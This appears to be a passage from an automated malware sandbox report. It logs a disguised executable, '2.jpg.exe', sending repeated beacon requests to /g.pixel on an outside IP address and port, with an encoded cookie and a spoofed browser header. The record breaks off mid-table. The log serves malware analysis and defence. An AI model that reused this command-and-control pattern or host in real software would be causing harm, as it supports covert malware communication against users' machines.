Apr 19, 2024 09:50:56.556394100 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:56.877624035 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:56 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49809	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:57.320543051 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:57.657228947 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:57 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49810	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:58.090668917 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:58.414830923 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:58 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49811	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:58.868501902 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:59.205900908 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:59 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49812	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:59.647711039 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:59.983263969 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:59 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49813	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:00.419537067 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:00.745043993 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:00 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49814	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:01.177300930 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:01.493992090 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:01 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49815	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:01.930954933 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:02.252291918 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:02 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49816	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:02.703186035 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:03.026295900 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:02 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49817	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:04.088046074 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:04.429053068 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:04 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49818	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:04.870831966 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:05.206963062 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:05 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	49819	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:05.659329891 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:05.978637934 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:05 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	49820	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:06.447881937 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:06.769150972 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:06 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	49821	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:07.203593969 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:07.531819105 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:07 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	49822	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:07.974930048 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:08.309839010 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:08 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	49823	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:08.742126942 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:09.062599897 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:08 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	49824	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:09.497498989 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:09.823120117 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:09 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	49825	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:10.262671947 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:10.588037968 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:10 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	49826	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:11.017699957 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:11.331636906 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:11 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	49827	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:11.778014898 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:12.117337942 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:11 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	49828	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:12.562295914 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:12.889106035 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:12 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	49829	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:13.320489883 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:13.640295029 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:13 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	49830	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:14.070343971 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:14.390037060 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:14 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	49831	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:14.840965033 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:15.181468010 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:15 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	49832	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:15.617444992 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:15.937375069 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:15 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	49833	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:16.373707056 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:16.699316025 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:16 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	49834	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:17.138624907 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:17.463918924 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:17 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	49835	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:17.896373034 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:18.214231014 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:18 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	49836	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:18.652326107 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:18.975106955 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:18 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	49837	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
